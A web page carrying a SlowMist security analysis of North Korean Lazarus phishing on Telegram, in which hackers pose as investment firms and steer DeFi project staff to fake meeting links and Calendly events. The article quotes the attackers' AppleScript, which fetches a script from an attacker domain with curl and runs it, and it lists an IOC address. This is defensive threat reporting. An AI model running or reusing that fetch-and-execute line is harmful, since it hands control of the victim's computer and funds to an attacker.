今日运势评分

-3

本月运势

癸未月

震荡偏多

甲克戊,申金生水
癸不词讼理弱敌强
未不服药毒气入肠

祭祀,出行,交易,割蜜,造畜稠

嫁娶,作灶,安葬,动土,词讼,作梁,伐木,掘井,破土,移徙

月相

寝待

底部反弹

日冲

Powered by RitMEX

注册/

TRUMP9.74 -0.33%

SUI3.95 14.58%

TON3.02 0.36%

TRX0.30 0.08%

DOGE0.21 3.42%

XRP2.98 6.84%

SOL166.55 2.77%

BNB704.22 1.90%

ETH3052.54 2.93%

BTC121405.85 2.79%

ETH Gas3.27 Gwei

贪婪
74
首页 深潮精选 Research 项目发现 7x24h︎快讯 最新活动

慢雾:朝鲜黑客 Telegram 定点欺诈攻击分析

2023.12.07 - 585 天前
朝鲜黑客开始冒充知名投资机构,对项目方进行欺诈钓鱼,影响范围较大。

撰文: 23pds@慢雾安全团队

背景

早在 2022 年,慢雾安全团队就通过慢雾 BTI 情报网络发现朝鲜黑客 Lazarus 团伙开启针对加密货币行业的大规模 Telegram 欺诈钓鱼行动,近期朝鲜黑客更是开始冒充知名投资机构,对项目方进行欺诈钓鱼,鉴于影响范围较大,慢雾在此进行分析。

技战法

一、挑选知名投资机构作为冒充对象,然后建立虚假的 Telegram 帐号:

二、寻找知名的 DeFi 项目方作为目标,以要投资他们为名,使用虚假帐号开始实施骗局:

朝鲜黑客会先对目标发起聊天以建立联系,如果项目方看到消息且安全意识不足,就会出现下图的一幕:

朝鲜黑客骗取项目方的信任后便开始约会议,此处有两种攻击手法:

1. 邀请项目方加入如 ***.group-meeting.team 之类的会议,假装询问对方是否有时间安排会面或详谈,并主动提供恶意会议链接。项目方点击链接后会看到地区访问限制,这时朝鲜黑客会接着诱使项目方下载并运行其提供的“修改定位”的恶意脚本。一旦项目方照做,那么他的电脑就会被朝鲜黑客控制,导致资金被盗取。下面是恶意脚本 IP_Request.scpt 的内容:

set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"

set sc to do shell script "curl -L -k""& fix_url &"\""

run script sc

代码解释:

2. 利用 Calendly 会议预定系统的「添加自定义链接」在事件页面的功能,在事件上插入恶意链接发起钓鱼攻击。由于 Calendly 与大多数项目方的日常工作背景很好地融合在一起,因此这些恶意链接不容易引起怀疑,项目方容易无意中点击恶意链接,下载并执行恶意代码,此时朝鲜黑客同样可以获取到项目方系统相关信息或权限。

慢雾安全团队在 2023 年 11 月 30 日 也对相关攻击手法做过提醒:

基础 IOC:

IP: 104.168.137.21

Domains:

恶意攻击样例:

总结

鉴于此类诈骗行为仍在持续发生,建议 Web3 用户务必确保在添加好友时通过双重渠道确认对方的真实性,同时对 Telegram 开启双重身份验证(2FA),随时注意交易安全,以免遭受资金损失。

一旦不慎运行相关木马,请第一时间转移相关资金、断网杀毒,同时修改目标电脑上(包括浏览器里记录的)相关账号密码等信息。

欢迎加入深潮TechFlow官方社群

Telegram订阅群:https://t.me/TechFlowDaily
Twitter官方账号:https://x.com/TechFlowPost
Twitter英文账号:https://x.com/BlockFlow_News
原文链接 
添加收藏
分享社交媒体
作者慢雾科技@SlowMist_Team
相关文章
2025.06.23 - 21 天前
加密货币市场的隐藏风险:如果 Telegram 停摆会发生什么?
减少过度依赖和实现平台多元化不再是可选项,它是一种必要的生存策略。
Telegram
2025.06.20 - 24 天前
Telegram 创始人的「DNA 空投」,年仅 40 已立下百子遗嘱
这是 Pavel Durov 接受的最长专访,一场关于政治、权力和民主的访谈。
Telegram
2025.06.19 - 25 天前
TAC 融资 1150 万美元,旨在将 DeFi 带入 Telegram 的十亿用户生态系统
TAC 通过将以太坊 dApps 带入 Telegram 和 TON,正在为用户提供新的机会,推动 DeFi 的普及。
TAC DeFi Telegram
2025.06.13 - 31 天前
Telegram Gift 蹿红,比之前的 NFT 强在哪里?
最好的用户体验能为用户创造最大的价值。
Telegram NFT
2025.06.12 - 32 天前
无人关注的 TON,正在靠 NFT 翻身
Telegram 也开始炒「QQ 秀」了?
TON NFT Telegram
2025.05.30 - 45 天前
Telegram 拟发行 15 亿美元债券,将集成马斯克旗下 xAI 并获得股份和订阅分成
虽然创始人 Pavel Durov 仍在法国被「禁足」,但 Telegram 仍赢得投资者的支持。
Telegram
2025.03.21 - 115 天前
Telegram 创始人重获自由身,TON 官宣 4 亿美金融资,发展困局或迎转机
单一的叙事逻辑、资源分配的失衡、外部事件的冲击以及市场周期的波动,TON生态陷入了阵痛期。
Telegram
2025.03.18 - 118 天前
离开 Telegram 小游戏的人
Telegram 小游戏的兴衰并不是一个独立现象,它只是整个 Web3 行业的一种极端「缩影」。
Telegram
2025.03.17 - 119 天前
加密早报:Telegram 创始人获准离开法国前往迪拜,本周 FTN、IMX、ENA 及 APE 等代币将于迎来大额解锁
Meme 币与非 Meme 币市值比例已由去年11月峰值的 9% 降至如今的 5.67%。
原创 Telegram 代币解锁
2024.11.21 - 235 天前
成也用户,败也用户,我们还要在 Telegram 做增长吗?
本文将从 Telegram 近期发展的角度试图分析未来在 Telegram/TON 上做增长的有效路径。
原创 Telegram
7x24h 快讯︎更多
07月14日 20:02
Strategy上周增持 4225 枚比特币,均价 111,827美元
07月14日 19:39
加拿大上市公司 Matador 计划于未来 2 年筹集最高 9 亿加元,用于比特币积累及基础设施建设
07月14日 19:30
英国上市金矿勘探公司 Bluebird Mining 收购 756 台比特币矿机
07月14日 19:24
美股上市公司 Sonnet BioTherapeutics 将与 Rorschach I LLC 合并为 Hyperliquid Strategies ,并推进 HYPE 储备战略
07月14日 19:10
币安:当前 Alpha 市场上 BR、KOGE 存在交易量过大等问题,用户需防范价格波动风险
07月14日 19:06
巴克莱:美国对欧盟征收关税将再次考验美股韧性
07月14日 19:06
分析师:比特币创新高是因为投资者多元化配置资产
07月14日 19:03
币安 Alpha、合约在 7 月 15 日上线TAC (TAC) ,符合条件的用户可申领空投
深潮精选更多
5 亿美金 12 分钟卖光,PUMP 预售到底是谁的游戏?

2025.07.14

比推特快一步,新 Coinbase Wallet 进化成微信

2025.07.14

一场装修引发的全球放水

2025.07.14

Pump/Bonk/$M 三分 Meme,资产发行的两条路径

2025.07.14

BTC 战略储备和人工智能填补减半缺口

2025.07.14

专注Web3行业深度报道,洞察潮水流动的方向
我要投稿寻求报道
风险提示:本网站所有内容不构成投资建议,且无任何带单、引导交易服务;根据央行等十部委发布《关于进一步防范和处置虚拟货币交易炒作风险的通知》请读者提高风险意识。联系我们 / support@techflowpost.com 琼ICP备2022009338号

FOLLOW US

DeFlow

扫码关注公众号

电报群
商务合作
RSS-精选